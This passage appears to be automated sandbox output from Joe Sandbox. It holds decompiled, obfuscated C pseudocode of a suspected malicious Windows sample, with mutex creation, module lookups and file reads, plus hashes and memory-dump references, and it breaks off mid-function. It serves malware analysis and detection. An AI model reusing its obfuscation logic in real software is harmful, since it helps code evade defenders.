                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 81cd660e0cd64c9a35aeb3573f42dcaad1a088f0ddec36f7bbe802a1a74e3811
                                                                                                                                                                                                                                                    • Instruction ID: 9e59bf2e1914e402d4f4444f0ebb1f106a441069e711824627930b6688a59c65
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81cd660e0cd64c9a35aeb3573f42dcaad1a088f0ddec36f7bbe802a1a74e3811
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1022D71E002199FDF55CFADC8806AEBBF1FF48324F1581AAD959E7385D731AA418B80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                                    			E010D3690() {
                                                                                                                                                                                                                                                    				intOrPtr _t247;
                                                                                                                                                                                                                                                    				intOrPtr _t255;
                                                                                                                                                                                                                                                    				intOrPtr _t262;
                                                                                                                                                                                                                                                    				intOrPtr _t294;
                                                                                                                                                                                                                                                    				intOrPtr _t301;
                                                                                                                                                                                                                                                    				intOrPtr _t332;
                                                                                                                                                                                                                                                    				intOrPtr _t351;
                                                                                                                                                                                                                                                    				intOrPtr _t368;
                                                                                                                                                                                                                                                    				signed int _t389;
                                                                                                                                                                                                                                                    				intOrPtr _t448;
                                                                                                                                                                                                                                                    				intOrPtr _t449;
                                                                                                                                                                                                                                                    				intOrPtr _t459;
                                                                                                                                                                                                                                                    				intOrPtr* _t498;
                                                                                                                                                                                                                                                    				void* _t500;
                                                                                                                                                                                                                                                    				void* _t509;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t498 = _t500 - 0x60;
                                                                                                                                                                                                                                                    				 *(_t498 + 0x58) =  *(_t498 + 0x7c) - 0xef;
                                                                                                                                                                                                                                                    				 *(_t498 + 0x50) =  *(_t498 + 0x7c) ^ 0x000000a5;
                                                                                                                                                                                                                                                    				 *(_t498 + 0x5c) =  *(_t498 + 0x7c) - 0x2687;
                                                                                                                                                                                                                                                    				 *(_t498 + 0x48) =  *(_t498 + 0x6c) ^ 0x0000253b;
                                                                                                                                                                                                                                                    				 *(_t498 + 0x4c) =  *(_t498 + 0x74) ^ 0x00000d5f;
                                                                                                                                                                                                                                                    				 *(_t498 + 0x54) =  *(_t498 + 0x7c) + 0x4d;
                                                                                                                                                                                                                                                    				 *(_t498 + 0x44) =  *(_t498 + 0x7c) + 0x5e;
                                                                                                                                                                                                                                                    				if( *(_t498 + 0x58) > ( *(_t498 + 0x5c) ^ 0x00002796)) {
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 - 0x18)) =  *((intOrPtr*)(_t498 + 0x78));
                                                                                                                                                                                                                                                    					 *(_t498 - 0x14) =  *( *((intOrPtr*)(_t498 + 0x78)) + 0xbadc71) ^  *( *((intOrPtr*)(_t498 + 0x78)) + 0xbadbfd);
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 - 0x10)) =  *(_t498 + 0x50) -  *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xbadc29));
                                                                                                                                                                                                                                                    					_t247 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *(_t498 - 0xc) =  *( *((intOrPtr*)(_t498 + 0x78)) + 0xf4) ^  *(_t498 + 0x5c) |  *(_t247 + 0x4c);
                                                                                                                                                                                                                                                    					 *(_t498 - 8) =  *(_t498 + 0x48) |  *(_t498 + 0x50);
                                                                                                                                                                                                                                                    					_t332 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *(_t498 - 4) = ( *(_t332 + 0xbadbed) |  *( *((intOrPtr*)(_t498 + 0x78)) + 0xbadc65)) ^  *(_t498 + 0x58);
                                                                                                                                                                                                                                                    					 *(_t498 + 0x5c) = E010D2800( *((intOrPtr*)(_t498 - 0x18)),  *(_t498 - 0x14),  *((intOrPtr*)(_t498 - 0x10)),  *(_t498 - 0xc),  *(_t498 - 8),  *(_t498 - 4));
                                                                                                                                                                                                                                                    					 *(_t498 - 0x24) =  *(_t498 + 0x4c) ^  *0x116d69c;
                                                                                                                                                                                                                                                    					_t255 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *(_t498 - 0x20) = ( *(_t498 + 0x44) ^  *(_t498 + 0x58)) -  *((intOrPtr*)(_t255 + 0xbadbdd));
                                                                                                                                                                                                                                                    					 *(_t498 - 0x1c) = ( *( *((intOrPtr*)(_t498 + 0x78)) + 0xbadc81) ^  *( *((intOrPtr*)(_t498 + 0x78)) + 0xdc)) +  *0x116d69c;
                                                                                                                                                                                                                                                    					CreateMutexA( *(_t498 - 0x24),  *(_t498 - 0x20),  *(_t498 - 0x1c));
                                                                                                                                                                                                                                                    					 *(_t498 - 0x28) =  *(_t498 + 0x50) | 0x00002506;
                                                                                                                                                                                                                                                    					GetModuleHandleA( *(_t498 - 0x28));
                                                                                                                                                                                                                                                    					 *(_t498 - 0x40) =  *(_t498 + 0x4c) &  *( *((intOrPtr*)(_t498 + 0x78)) + 0xb0) ^  *(_t498 + 0x54);
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 - 0x3c)) =  *((intOrPtr*)(_t498 + 0x78));
                                                                                                                                                                                                                                                    					 *(_t498 - 0x38) =  *(_t498 + 0x50) & 0x00002506;
                                                                                                                                                                                                                                                    					_t262 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 - 0x34)) = ( *(_t498 + 0x58) ^  *(_t262 + 0xbadca9)) - 0x26e5;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 - 0x30)) =  *( *((intOrPtr*)(_t498 + 0x78)) + 0xdc) -  *(_t498 + 0x50);
                                                                                                                                                                                                                                                    					_t351 =  *0x116d6a4; // 0x0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 - 0x2c)) = _t351 -  *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xd4));
                                                                                                                                                                                                                                                    					 *(_t498 + 0x50) = E010E5EA0( *(_t498 - 0x40),  *((intOrPtr*)(_t498 - 0x3c)),  *(_t498 - 0x38),  *((intOrPtr*)(_t498 - 0x34)),  *((intOrPtr*)(_t498 - 0x30)),  *((intOrPtr*)(_t498 - 0x2c)));
                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xbadc15)) = ( *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xfc)) - 0x00002796 | 0x00002628) +  *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xbadc15));
                                                                                                                                                                                                                                                    					 *(_t498 + 0x54) = ( *(_t498 + 0x58) *  *(_t498 + 0x54) | 0x000025a0) ^  *(_t498 + 0x54);
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 + 0x28)) =  *((intOrPtr*)(_t498 + 0x78));
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 + 0x2c)) =  *(_t498 + 0x58) - 0x33;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x30) =  *(_t498 + 0x4c) ^ 0x00000063;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 + 0x34)) =  *(_t498 + 0x54) + 0x11;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 + 0x38)) =  *(_t498 + 0x54) + 0xc2;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 + 0x3c)) =  *(_t498 + 0x5c) + 0x2687;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x5c) = E010D2800( *((intOrPtr*)(_t498 + 0x28)),  *((intOrPtr*)(_t498 + 0x2c)),  *(_t498 + 0x30),  *((intOrPtr*)(_t498 + 0x34)),  *((intOrPtr*)(_t498 + 0x38)),  *((intOrPtr*)(_t498 + 0x3c)));
                                                                                                                                                                                                                                                    					 *(_t498 + 0x4c) =  *(_t498 + 0x4c) ^ 0x000002dc;
                                                                                                                                                                                                                                                    					_t459 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t40 = _t459 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                    					_t294 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t294 + 0x9c)) =  *_t40 -  *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xa4)) + 0x658d1;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 + 0x14)) =  *(_t498 + 0x48) + 0x2598;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x18) =  *(_t498 + 0x5c) ^ 0x00000edf;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 + 0x1c)) =  *((intOrPtr*)(_t498 + 0x78));
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 + 0x20)) =  *(_t498 + 0x58) - 0xd1;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x24) =  *(_t498 + 0x4c) ^ 0x00000282;
                                                                                                                                                                                                                                                    					_push( *(_t498 + 0x24));
                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t498 + 0x20)));
                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t498 + 0x1c)));
                                                                                                                                                                                                                                                    					_push( *(_t498 + 0x18));
                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t498 + 0x14)));
                                                                                                                                                                                                                                                    					 *(_t498 + 0x5c) = E010D1000();
                                                                                                                                                                                                                                                    					 *(_t498 + 0x54) =  *(_t498 + 0x54) - 0x199;
                                                                                                                                                                                                                                                    					 *_t498 =  *(_t498 + 0x58) - 0x92;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 + 4)) =  *(_t498 + 0x48) + 0x2628;
                                                                                                                                                                                                                                                    					 *(_t498 + 8) =  *(_t498 + 0x54) ^ 0x00000313;
                                                                                                                                                                                                                                                    					_t301 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 + 0xc)) = _t301;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t498 + 0x10)) =  *(_t498 + 0x50) - 0x8a;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x5c) = E010D2590( *_t498,  *((intOrPtr*)(_t498 + 4)),  *(_t498 + 8),  *((intOrPtr*)(_t498 + 0xc)),  *((intOrPtr*)(_t498 + 0x10)));
                                                                                                                                                                                                                                                    					_t389 =  *0x116d618; // 0x38fa
                                                                                                                                                                                                                                                    					 *(_t498 + 0x40) = _t389;
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						_t509 =  *(_t498 + 0x40) -  *0x116d61c; // 0x4351e17c
                                                                                                                                                                                                                                                    						if(_t509 > 0) {
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *0x116d690 =  *(_t498 + 0x40) *  *(_t498 + 0x40) +  *0x116d690;
                                                                                                                                                                                                                                                    						 *0x0116D664 = ( *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xac)) - 0x1a0e73) *  *0x0116D664;
                                                                                                                                                                                                                                                    						 *0x0116D6EC =  *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xfc)) - 0x00000001 |  *0x0116D6EC;
                                                                                                                                                                                                                                                    						 *( *((intOrPtr*)(_t498 + 0x78)) + 0x7c) =  *( *((intOrPtr*)(_t498 + 0x78)) + 0xf4) + 0x2cda98ba |  *( *((intOrPtr*)(_t498 + 0x78)) + 0x7c);
                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xfc)) =  *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xfc)) +  *( *((intOrPtr*)(_t498 + 0x78)) + 0xb0);
                                                                                                                                                                                                                                                    						 *(_t498 + 0x40) =  *(_t498 + 0x40) + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *(_t498 + 0x50) =  *(_t498 + 0x50) - 0xe7;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x58) =  *(_t498 + 0x58) + 0x9b;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x5c) =  *(_t498 + 0x5c) - 0x65;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x4c) =  *(_t498 + 0x4c) ^ 0x000002dc;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if( *(_t498 + 0x4c) <  *(_t498 + 0x44) + 0x155 &&  *(_t498 + 0x48) <=  *(_t498 + 0x58) + 0xa1) {
                                                                                                                                                                                                                                                    					 *(_t498 + 0x44) =  *(_t498 + 0x44) ^ 0x000003de;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x48) =  *(_t498 + 0x48) + 0x26e5;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x54) =  *(_t498 + 0x54) + 0xe7;
                                                                                                                                                                                                                                                    					_t448 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t368 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t223 = _t368 + 0xa0; // 0xab88ba4e
                                                                                                                                                                                                                                                    					_t449 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *(_t449 + 0xa0) = ( *(_t448 + 0xbadc71) ^ 0x00000007) *  *_t223;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x48) =  *(_t498 + 0x48) ^ 0x00000edf;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x44) =  *(_t498 + 0x44) - 0x74;
                                                                                                                                                                                                                                                    					 *(_t498 + 0x5c) =  *(_t498 + 0x5c) ^ 0x0000003d;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return  *(_t498 + 0x5c) ^ 0x00000324;
                                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                                    0x010d3691
                                                                                                                                                                                                                                                    0x010d36a4
                                                                                                                                                                                                                                                    0x010d36b0
                                                                                                                                                                                                                                                    0x010d36bc
                                                                                                                                                                                                                                                    0x010d36c7
                                                                                                                                                                                                                                                    0x010d36d3
                                                                                                                                                                                                                                                    0x010d36dc
                                                                                                                                                                                                                                                    0x010d36e5
                                                                                                                                                                                                                                                    0x010d36f4
                                                                                                                                                                                                                                                    0x010d396e
                                                                                                                                                                                                                                                    0x010d3992
                                                                                                                                                                                                                                                    0x010d39a7
                                                                                                                                                                                                                                                    0x010d39be
                                                                                                                                                                                                                                                    0x010d39c7
                                                                                                                                                                                                                                                    0x010d39d0
                                                                                                                                                                                                                                                    0x010d39e3
                                                                                                                                                                                                                                                    0x010d39fa
                                                                                                                                                                                                                                                    0x010d3a1d
                                                                                                                                                                                                                                                    0x010d3a29
                                                                                                                                                                                                                                                    0x010d3a3a
                                                                                                                                                                                                                                                    0x010d3a43
                                                                                                                                                                                                                                                    0x010d3a67
                                                                                                                                                                                                                                                    0x010d3a76
                                                                                                                                                                                                                                                    0x010d3a85
                                                                                                                                                                                                                                                    0x010d3a8c
                                                                                                                                                                                                                                                    0x010d3aa1
                                                                                                                                                                                                                                                    0x010d3aa7
                                                                                                                                                                                                                                                    0x010d3ab3
                                                                                                                                                                                                                                                    0x010d3abe
                                                                                                                                                                                                                                                    0x010d3ad3
                                                                                                                                                                                                                                                    0x010d3ae2
                                                                                                                                                                                                                                                    0x010d3af0
                                                                                                                                                                                                                                                    0x010d3afd
                                                                                                                                                                                                                                                    0x010d3b20
                                                                                                                                                                                                                                                    0x010d3b59
                                                                                                                                                                                                                                                    0x010d3b6d
                                                                                                                                                                                                                                                    0x010d36fa
                                                                                                                                                                                                                                                    0x010d36fd
                                                                                                                                                                                                                                                    0x010d3706
                                                                                                                                                                                                                                                    0x010d370f
                                                                                                                                                                                                                                                    0x010d3718
                                                                                                                                                                                                                                                    0x010d3723
                                                                                                                                                                                                                                                    0x010d372f
                                                                                                                                                                                                                                                    0x010d3752
                                                                                                                                                                                                                                                    0x010d375e
                                                                                                                                                                                                                                                    0x010d3769
                                                                                                                                                                                                                                                    0x010d3772
                                                                                                                                                                                                                                                    0x010d3785
                                                                                                                                                                                                                                                    0x010d378a
                                                                                                                                                                                                                                                    0x010d3799
                                                                                                                                                                                                                                                    0x010d37a5
                                                                                                                                                                                                                                                    0x010d37ab
                                                                                                                                                                                                                                                    0x010d37b7
                                                                                                                                                                                                                                                    0x010d37c3
                                                                                                                                                                                                                                                    0x010d37c9
                                                                                                                                                                                                                                                    0x010d37cd
                                                                                                                                                                                                                                                    0x010d37d1
                                                                                                                                                                                                                                                    0x010d37d5
                                                                                                                                                                                                                                                    0x010d37d9
                                                                                                                                                                                                                                                    0x010d37e2
                                                                                                                                                                                                                                                    0x010d37ee
                                                                                                                                                                                                                                                    0x010d37f9
                                                                                                                                                                                                                                                    0x010d3805
                                                                                                                                                                                                                                                    0x010d3811
                                                                                                                                                                                                                                                    0x010d3814
                                                                                                                                                                                                                                                    0x010d3819
                                                                                                                                                                                                                                                    0x010d3825
                                                                                                                                                                                                                                                    0x010d3844
                                                                                                                                                                                                                                                    0x010d3847
                                                                                                                                                                                                                                                    0x010d384d
                                                                                                                                                                                                                                                    0x010d385b
                                                                                                                                                                                                                                                    0x010d385e
                                                                                                                                                                                                                                                    0x010d3864
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d3877
                                                                                                                                                                                                                                                    0x010d38a3
                                                                                                                                                                                                                                                    0x010d38d4
                                                                                                                                                                                                                                                    0x010d3903
                                                                                                                                                                                                                                                    0x010d392d
                                                                                                                                                                                                                                                    0x010d3858
                                                                                                                                                                                                                                                    0x010d3858
                                                                                                                                                                                                                                                    0x010d3942
                                                                                                                                                                                                                                                    0x010d394e
                                                                                                                                                                                                                                                    0x010d3957
                                                                                                                                                                                                                                                    0x010d3963
                                                                                                                                                                                                                                                    0x010d3963
                                                                                                                                                                                                                                                    0x010d3b7c
                                                                                                                                                                                                                                                    0x010d3b98
                                                                                                                                                                                                                                                    0x010d3ba4
                                                                                                                                                                                                                                                    0x010d3baf
                                                                                                                                                                                                                                                    0x010d3bb9
                                                                                                                                                                                                                                                    0x010d3bc9
                                                                                                                                                                                                                                                    0x010d3bcf
                                                                                                                                                                                                                                                    0x010d3bd6
                                                                                                                                                                                                                                                    0x010d3bdc
                                                                                                                                                                                                                                                    0x010d3bf1
                                                                                                                                                                                                                                                    0x010d3bfa
                                                                                                                                                                                                                                                    0x010d3c03
                                                                                                                                                                                                                                                    0x010d3c03
                                                                                                                                                                                                                                                    0x010d3c15

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(?,?,?), ref: 010D3A76
                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 010D3A8C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateHandleModuleMutex
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3857879770-0
                                                                                                                                                                                                                                                    • Opcode ID: 53b888a9d68978d16d3fbaf0f8b841baa3a18f05579e8515dc52353e0bc1daec
                                                                                                                                                                                                                                                    • Instruction ID: a82b14204c7ba180ae23dd3fab077f08157362799749be8fc28485f883af5fe2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53b888a9d68978d16d3fbaf0f8b841baa3a18f05579e8515dc52353e0bc1daec
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6202B5B1600149CFEB18CFA9D590A9E7BF6FF88304F508229EA199B795D735E841CF84
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 99%
                                                                                                                                                                                                                                                    			E010E55C0(intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int _a28) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				unsigned int _v12;
                                                                                                                                                                                                                                                    				unsigned int _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                                                    				struct _OVERLAPPED* _v88;
                                                                                                                                                                                                                                                    				DWORD* _v92;
                                                                                                                                                                                                                                                    				long _v96;
                                                                                                                                                                                                                                                    				void* _v100;
                                                                                                                                                                                                                                                    				void* _v104;
                                                                                                                                                                                                                                                    				intOrPtr _t353;
                                                                                                                                                                                                                                                    				signed int _t355;
                                                                                                                                                                                                                                                    				signed int _t378;
                                                                                                                                                                                                                                                    				intOrPtr _t387;
                                                                                                                                                                                                                                                    				intOrPtr _t391;
                                                                                                                                                                                                                                                    				intOrPtr _t392;
                                                                                                                                                                                                                                                    				intOrPtr _t394;
                                                                                                                                                                                                                                                    				signed int _t395;
                                                                                                                                                                                                                                                    				intOrPtr _t396;
                                                                                                                                                                                                                                                    				intOrPtr _t407;
                                                                                                                                                                                                                                                    				signed int _t412;
                                                                                                                                                                                                                                                    				signed int _t413;
                                                                                                                                                                                                                                                    				intOrPtr _t429;
                                                                                                                                                                                                                                                    				intOrPtr _t441;
                                                                                                                                                                                                                                                    				intOrPtr _t443;
                                                                                                                                                                                                                                                    				signed int _t457;
                                                                                                                                                                                                                                                    				intOrPtr _t469;
                                                                                                                                                                                                                                                    				intOrPtr _t478;
                                                                                                                                                                                                                                                    				intOrPtr _t479;
                                                                                                                                                                                                                                                    				intOrPtr _t482;
                                                                                                                                                                                                                                                    				intOrPtr _t504;
                                                                                                                                                                                                                                                    				intOrPtr _t508;
                                                                                                                                                                                                                                                    				intOrPtr _t509;
                                                                                                                                                                                                                                                    				signed int _t528;
                                                                                                                                                                                                                                                    				intOrPtr _t531;
                                                                                                                                                                                                                                                    				intOrPtr _t532;
                                                                                                                                                                                                                                                    				intOrPtr _t537;
                                                                                                                                                                                                                                                    				intOrPtr _t544;
                                                                                                                                                                                                                                                    				intOrPtr _t558;
                                                                                                                                                                                                                                                    				intOrPtr _t561;
                                                                                                                                                                                                                                                    				intOrPtr _t574;
                                                                                                                                                                                                                                                    				intOrPtr _t581;
                                                                                                                                                                                                                                                    				intOrPtr _t584;
                                                                                                                                                                                                                                                    				intOrPtr _t596;
                                                                                                                                                                                                                                                    				intOrPtr _t604;
                                                                                                                                                                                                                                                    				intOrPtr _t606;
                                                                                                                                                                                                                                                    				intOrPtr _t609;
                                                                                                                                                                                                                                                    				intOrPtr _t611;
                                                                                                                                                                                                                                                    				intOrPtr _t614;
                                                                                                                                                                                                                                                    				intOrPtr _t622;
                                                                                                                                                                                                                                                    				intOrPtr _t638;
                                                                                                                                                                                                                                                    				signed int _t640;
                                                                                                                                                                                                                                                    				intOrPtr _t642;
                                                                                                                                                                                                                                                    				intOrPtr _t646;
                                                                                                                                                                                                                                                    				intOrPtr _t647;
                                                                                                                                                                                                                                                    				intOrPtr _t655;
                                                                                                                                                                                                                                                    				intOrPtr _t683;
                                                                                                                                                                                                                                                    				intOrPtr _t693;
                                                                                                                                                                                                                                                    				intOrPtr _t695;
                                                                                                                                                                                                                                                    				intOrPtr _t707;
                                                                                                                                                                                                                                                    				intOrPtr _t716;
                                                                                                                                                                                                                                                    				intOrPtr _t719;
                                                                                                                                                                                                                                                    				intOrPtr _t721;
                                                                                                                                                                                                                                                    				intOrPtr _t739;
                                                                                                                                                                                                                                                    				intOrPtr _t740;
                                                                                                                                                                                                                                                    				intOrPtr _t757;
                                                                                                                                                                                                                                                    				intOrPtr _t764;
                                                                                                                                                                                                                                                    				intOrPtr _t769;
                                                                                                                                                                                                                                                    				intOrPtr _t770;
                                                                                                                                                                                                                                                    				intOrPtr _t772;
                                                                                                                                                                                                                                                    				intOrPtr _t774;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = _a16 - 0x122;
                                                                                                                                                                                                                                                    				_v32 = _a8 + 0xbd;
                                                                                                                                                                                                                                                    				_v44 = _a20 ^ 0x000003bc;
                                                                                                                                                                                                                                                    				_v40 = _a28 ^ 0x00000142;
                                                                                                                                                                                                                                                    				_v52 = _a8 ^ 0x00002628;
                                                                                                                                                                                                                                                    				_v20 = _a12 ^ 0x00000221;
                                                                                                                                                                                                                                                    				_v48 = _a20;
                                                                                                                                                                                                                                                    				_v56 = _a24 - 0xc3;
                                                                                                                                                                                                                                                    				if(_v40 == _v32 + 0x11c) {
                                                                                                                                                                                                                                                    					_v36 = _v8;
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						_t353 = _a4;
                                                                                                                                                                                                                                                    						_t504 = _a4;
                                                                                                                                                                                                                                                    						__eflags = _v36 - ( *(_t353 + 0x3c) &  *(_t504 + 0xb4) ^ 0x000024c7);
                                                                                                                                                                                                                                                    						if(_v36 <= ( *(_t353 + 0x3c) &  *(_t504 + 0xb4) ^ 0x000024c7)) {
                                                                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t638 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						__eflags =  *((intOrPtr*)(_t638 + 0xbadca9)) - _v20 + 0x253b;
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t638 + 0xbadca9)) == _v20 + 0x253b) {
                                                                                                                                                                                                                                                    							_v8 = (_v8 - _v20 - 0x2628) * _v8;
                                                                                                                                                                                                                                                    							_t508 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t289 = _t508 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                    							_t642 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t290 = _t642 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                    							_t509 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							 *(_t509 + 0xac) = ( *0x0116D6A8 | 0x00002801) +  *_t289 |  *_t290;
                                                                                                                                                                                                                                                    							_v56 = _v20 * _v20 * _v44;
                                                                                                                                                                                                                                                    							_t646 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t647 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							 *(_t647 + 0xbadbdd) = (_v40 | 0x00002633) *  *(_t646 + 0xbadbdd);
                                                                                                                                                                                                                                                    							 *(_a4 + 0x14) =  *(_a4 + 0x14) -  *((intOrPtr*)(_a4 + 0xbadc51)) -  *((intOrPtr*)(_a4 + 0xec));
                                                                                                                                                                                                                                                    							_v104 =  *(_a4 + 0x68) * _v44 +  *((intOrPtr*)(_a4 + 0xdc));
                                                                                                                                                                                                                                                    							_t655 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t378 =  *0x116d68c; // 0x14b95e
                                                                                                                                                                                                                                                    							_t319 = _t655 + 0xe4; // 0xc
                                                                                                                                                                                                                                                    							_v100 = (_t378 ^  *_t319) *  *(_a4 + 0xb4);
                                                                                                                                                                                                                                                    							_v96 = _v40 &  *(_a4 + 0xbadc29);
                                                                                                                                                                                                                                                    							_v92 =  *(_a4 + 0xbadbdd) |  *0x116d69c;
                                                                                                                                                                                                                                                    							_v88 = _v44 &  *(_a4 + 0xe0);
                                                                                                                                                                                                                                                    							ReadFile(_v104, _v100, _v96, _v92, _v88);
                                                                                                                                                                                                                                                    							_t387 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t342 = _t387 + 0x78; // 0x79aca
                                                                                                                                                                                                                                                    							_t528 = (_v52 -  *_t342 | 0x00002598) ^  *(_a4 + 0xac);
